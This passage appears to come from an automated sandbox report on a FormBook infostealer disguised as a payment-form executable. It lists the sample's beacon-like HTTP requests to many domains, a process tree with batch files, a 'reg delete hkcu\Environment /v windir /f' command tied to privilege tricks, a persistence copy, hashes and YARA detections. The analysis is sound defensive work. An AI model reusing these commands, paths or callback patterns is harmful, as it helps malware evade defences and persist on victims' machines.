                                                                                X-Powered-By: PHP/5.4.41
                                                                                Data Raw: 34 30 30 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 76 61 72 20 56 5f 50 41 54 48 3d 22 2f 22 3b 77 69 6e 64 6f 77 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 20 72 65 74 75 72 6e 20 74 72 75 65 3b 20 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 3c 74 69 74 6c 65 3e e6 be b3 e9 97 a8 e5 a8 81 e5 88 a9 e6 96 af e4 ba ba 37 38 38 5f 76 6e 73 63 33 37 37 35 e5 a8 81 e5 b0 bc e6 96 af e5 9f 8e e5 ae 98 e7 bd 91 5b e7 99 bb e5 85 a5 e5 b9 b3 e5 8f b0 5d 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 26 23 34 37 3b 26 23 31 30 36 3b 26 23 31 31 33 3b 26 23 31 31 37 3b 26 23 31 30 31 3b 26 23 31 31 34 3b 26 23 31 32 31 3b 26 23 34 36 3b 26 23 31 30 39 3b 26 23 31 30 35 3b 26 23 31 31 30 3b 26 23 34 36 3b 26 23 31 30 36 3b 26 23 31 31 35 3b 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 26 23 78 32 66 3b 26 23 78 37 34 3b 26 23 78 36 61 3b 26 23 78 32 65 3b 26 23 78 36 61 3b 26 23 78 37 33 3b 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 27 6d 61 69 6e 27 3e 0a 3c 69 3e 3c 68 32 3e 53 6f 6d 65 74 68 69 6e 67 20 65 72 72 6f 72 3a 3c 2f 68 32 3e 3c 2f 69 3e 0a 3c 70 3e 3c 68 33 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 33 3e 3c 68 33 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 27 72 65 64 27 3e 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 2e 3c 2f 66 6f 6e 74 3e 3c 2f 68 33 3e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 6f 72 20 3c 61 20 68 72 65 66 3d 27 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 27 3e 74 72 79 20 61 67 61 69 6e 3c 2f 61 3e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 3c 64 69 76 3e 68 6f 73 74 6e 61 6d 65 3a 20 53 65 72 76 65 72 3c 2f 64 69 76 3e 3c 68 72 3e 0a 3c 64 69 76 20 69 64 3d 27 70 62 27 3e 47 65 6e 65 72 61 74 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 64 6e 62 65 73 74 2e 63 6f 6d 2f 3f 63 6f 64 65 3d 34 30 34 27 20 74 61 72 67 65 74 3d 5f 62 6c 61 6e 6b 3e 6b 61 6e 67 6c 65 2f 33 2e 35 2e 31 36 2e 34 3c 2f 61 3e 2e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 64 64 69 6e 67 20 66 6f 72 20 69 65 20 2d 2d 3e 3c 21 2d 2d 20 70 61 64 64 69 6e 67 20 66 6f 72 20 69 65 20 2d 2d 3e 3c 21 2d 2d 20 70 61 64 64 69 6e 67 20 66 6f 72 20 69 65 20 2d 2d 3e 3c 21 2d 2d 20 70 61 64 64 69 6e 67 20 66 6f 72 20 69 65 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 400<html><head><head><script>var V_PATH="/";window.onerror=function(){ return true; };</script><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>澳门威利斯人788_vnsc3775威尼斯城官网[登入平台]</title><script language="javascript" type="text/javascript" src="&#47;&#106;&#113;&#117;&#101;&#114;&#121;&#46;&#109;&#105;&#110;&#46;&#106;&#115;" rel="nofollow"></script><script language="javascript" type="text/javascript" src="&#x2f;&#x74;&#x6a;&#x2e;&#x6a;&#x73;" rel="nofollow"></script></head><body><div id='main'><i><h2>Something error:</h2></i><p><h3>404 Not Found</h3><h3><font color='red'>No such file or directory.</font></h3></p><p>Please check or <a href='javascript:location.reload()'>try again</a> later.</p><div>hostname: Server</div><hr><div id='pb'>Generated by <a href='https://www.cdnbest.com/?code=404' target=_blank>kangle/3.5.16.4</a>.</div></div><!-- padding for ie --><!-- padding for ie --><!-- padding for ie --><!-- padding for ie --></body></html>0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                16 | 192.168.2.6 | 49773 | 34.98.99.30 | 80 | C:\Windows\explorer.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Aug 3, 2021 16:19:04.396164894 CEST | 6906 | OUT | GET /6mam/?wbYpSP=YkvzQHb0u0mjzgqcdkfc2nlAC0Yzm929bCO8fEJzAgzkJ6Iw6dVqaRJYZU+TtwSY8fdaCDocnA==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.kilbyrnefarm.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:19:04.509962082 CEST | 6907 | IN | HTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Tue, 03 Aug 2021 14:19:04 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "61048812-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                17 | 192.168.2.6 | 49774 | 86.105.245.69 | 80 | C:\Windows\explorer.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Aug 3, 2021 16:19:09.548891068 CEST | 6908 | OUT | GET /6mam/?wbYpSP=5npnSCZ0ck9LfxTaUtRZHwWauGngCjsEHbJTec35d6ZUl1gSnMY6WOunSeDfnMtC3HJRIA/gUg==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.dragonshipping.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:19:09.600625992 CEST | 6909 | IN | HTTP/1.1 302 Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Tue, 03 Aug 2021 14:19:09 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=9sb9ekuf90658gd9ivjuhv4oip; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                location: /
                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 1 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                18 | 192.168.2.6 | 49775 | 35.186.238.101 | 80 | C:\Windows\explorer.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Aug 3, 2021 16:19:14.630342960 CEST | 6909 | OUT | GET /6mam/?wbYpSP=djxA7LmI8yOR5lrxItMqg4jKcWhO49sHA38/CyXgFoUCakRbVREb3j6xA5Z01WfJADXfd3zybw==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.mylifeinpark.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:19:14.746182919 CEST | 6910 | IN | HTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Tue, 03 Aug 2021 14:19:14 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "60f9a3cb-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                19 | 192.168.2.6 | 49776 | 154.215.87.120 | 80 | C:\Windows\explorer.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Aug 3, 2021 16:19:29.357628107 CEST | 6911 | OUT | GET /6mam/?wbYpSP=Dhv3NEq4M+QwROw+dIik/SqBuvIY1/ydOcQwMfpHsV2StOMLf1p+AXWBQfK1e2Gy8MhXWnKhDQ==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.delhibudokankarate.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                2 | 192.168.2.6 | 49759 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Aug 3, 2021 16:17:20.471642971 CEST | 6880 | OUT | GET /6mam/?wbYpSP=oQhTdcG1kNI9/Lmcc2Ae/5c2EVHHJUmgpucHXQ4UdnJs0zjkXV1wGSuIEzpJIo84TCfrKzWPPA==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.beastninjas.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:17:20.586126089 CEST | 6880 | IN | HTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Tue, 03 Aug 2021 14:17:20 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "61048812-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                3 | 192.168.2.6 | 49760 | 23.27.129.115 | 80 | C:\Windows\explorer.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Aug 3, 2021 16:17:31.564062119 CEST | 6881 | OUT | GET /6mam/?wbYpSP=2ekFb54j3d1mky1ioMZXLX6Zs25on60VYd2MbHSx0a3rFw0M4/d2RTsPPkjiG9H4TZ6139bXkw==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.importexportasia.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                4 | 192.168.2.6 | 49761 | 34.98.99.30 | 80 | C:\Windows\explorer.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Aug 3, 2021 16:17:37.135760069 CEST | 6882 | OUT | GET /6mam/?wbYpSP=YkvzQHb0u0mjzgqcdkfc2nlAC0Yzm929bCO8fEJzAgzkJ6Iw6dVqaRJYZU+TtwSY8fdaCDocnA==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.kilbyrnefarm.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:17:37.249469042 CEST | 6883 | IN | HTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Tue, 03 Aug 2021 14:17:37 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "61048812-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                5 | 192.168.2.6 | 49762 | 86.105.245.69 | 80 | C:\Windows\explorer.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Aug 3, 2021 16:17:42.360260010 CEST | 6883 | OUT | GET /6mam/?wbYpSP=5npnSCZ0ck9LfxTaUtRZHwWauGngCjsEHbJTec35d6ZUl1gSnMY6WOunSeDfnMtC3HJRIA/gUg==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.dragonshipping.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:17:42.403304100 CEST | 6884 | IN | HTTP/1.1 302 Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Tue, 03 Aug 2021 14:17:42 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=df77ft85npmaafcrhvv81nvoia; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                location: /
                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 1 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                6 | 192.168.2.6 | 49763 | 35.186.238.101 | 80 | C:\Windows\explorer.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Aug 3, 2021 16:17:47.490041971 CEST | 6885 | OUT | GET /6mam/?wbYpSP=djxA7LmI8yOR5lrxItMqg4jKcWhO49sHA38/CyXgFoUCakRbVREb3j6xA5Z01WfJADXfd3zybw==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.mylifeinpark.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:17:47.603698015 CEST | 6885 | IN | HTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Tue, 03 Aug 2021 14:17:47 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "60f9a3c0-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                7 | 192.168.2.6 | 49764 | 154.215.87.120 | 80 | C:\Windows\explorer.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Aug 3, 2021 16:18:02.262365103 CEST | 6887 | OUT | GET /6mam/?wbYpSP=Dhv3NEq4M+QwROw+dIik/SqBuvIY1/ydOcQwMfpHsV2StOMLf1p+AXWBQfK1e2Gy8MhXWnKhDQ==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.delhibudokankarate.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                8 | 192.168.2.6 | 49765 | 64.190.62.111 | 80 | C:\Windows\explorer.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Aug 3, 2021 16:18:07.727356911 CEST | 6888 | OUT | GET /6mam/?wbYpSP=L6FmBYjymbItbbnnjd7yzq8hOevfuspHLpHNfkA4yzrvipy3lucWli1gmvwrFafR77bKFMYeeA==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.vavasoo.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:18:07.778529882 CEST | 6889 | IN | HTTP/1.1 302 Found
                                                                                date: Tue, 03 Aug 2021 14:18:07 GMT
                                                                                content-type: text/html; charset=UTF-8
                                                                                content-length: 0
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_RiU++kCshU1cpREzJib42Sw4YyFRH0ckQPHFCFmNVB14W1M2Ayhd1RibahQovNcO6UJ7P6dr/zvuUlXocRoB5A==
                                                                                expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                pragma: no-cache
                                                                                last-modified: Tue, 03 Aug 2021 14:18:07 GMT
                                                                                location: https://sedo.com/search/details/?partnerid=324561&language=it&domain=vavasoo.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
                                                                                x-cache-miss-from: parking-58759dfcb5-fg79f
                                                                                server: NginX
                                                                                connection: close


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                9 | 192.168.2.6 | 49766 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Aug 3, 2021 16:18:17.907407045 CEST | 6890 | OUT | GET /6mam/?wbYpSP=44unMI1Q/kB3N4iH8WCIjTNIPpmavX0UQR770OieCBmDyTCieL+ZZdhYfwuEfVyDA+gWGsSDYQ==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.schoolfrontoffice.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:18:18.021646023 CEST | 6891 | IN | HTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Tue, 03 Aug 2021 14:18:17 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "6104831f-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Code Manipulations

                                                                                Statistics

                                                                                Behavior


                                                                                System Behavior

                                                                                General

                                                                                Start time:16:15:18
                                                                                Start date:03/08/2021
                                                                                Path:C:\Users\user\Desktop\Form_TT_EUR57,890.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Users\user\Desktop\Form_TT_EUR57,890.exe'
                                                                                Imagebase:0x400000
                                                                                File size:702464 bytes
                                                                                MD5 hash:811EA41E60760A97B5F28973618728FE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:Borland Delphi
                                                                                Yara matches:
                                                                                • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000001.00000003.362637084.0000000002DC4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                                • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000001.00000003.362921408.0000000002D88000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                                Reputation:low

                                                                                General

                                                                                Start time:16:15:38
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\SysWOW64\logagent.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\System32\logagent.exe
                                                                                Imagebase:0x1d0000
                                                                                File size:86016 bytes
                                                                                MD5 hash:E2036AC444AB4AD91EECC1A80FF7212F
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.513499123.0000000004600000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.513499123.0000000004600000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.513499123.0000000004600000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.380848795.0000000010410000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.380848795.0000000010410000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.380848795.0000000010410000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.512824544.0000000002B50000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.512824544.0000000002B50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.512824544.0000000002B50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.515478166.0000000010410000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.515478166.0000000010410000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.515478166.0000000010410000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                Reputation:moderate

                                                                                General

                                                                                Start time:16:15:39
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
                                                                                Imagebase:0x2a0000
                                                                                File size:232960 bytes
                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Start time:16:15:39
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff61de10000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Start time:16:15:39
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
                                                                                Imagebase:0x2a0000
                                                                                File size:232960 bytes
                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Start time:16:15:40
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\explorer.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                Imagebase:0x7ff6f22f0000
                                                                                File size:3933184 bytes
                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Start time:16:15:40
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff61de10000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Start time:16:15:40
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
                                                                                Imagebase:0x2a0000
                                                                                File size:232960 bytes
                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                General

                                                                                Start time:16:15:41
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff61de10000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                General

                                                                                Start time:16:15:41
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\SysWOW64\reg.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:reg delete hkcu\Environment /v windir /f
                                                                                Imagebase:0xd60000
                                                                                File size:59392 bytes
                                                                                MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                General

                                                                                Start time:16:15:42
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff61de10000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                General

                                                                                Start time:16:15:46
                                                                                Start date:03/08/2021
                                                                                Path:C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe'
                                                                                Imagebase:0x400000
                                                                                File size:702464 bytes
                                                                                MD5 hash:811EA41E60760A97B5F28973618728FE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:Borland Delphi
                                                                                Yara matches:
                                                                                • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000010.00000003.437045703.0000000002DE4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                                • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000010.00000003.437534855.0000000002DA8000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                                Antivirus matches:
                                                                                • Detection: 20%, ReversingLabs

                                                                                General

                                                                                Start time:16:15:54
                                                                                Start date:03/08/2021
                                                                                Path:C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe'
                                                                                Imagebase:0x400000
                                                                                File size:702464 bytes
                                                                                MD5 hash:811EA41E60760A97B5F28973618728FE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:Borland Delphi
                                                                                Yara matches:
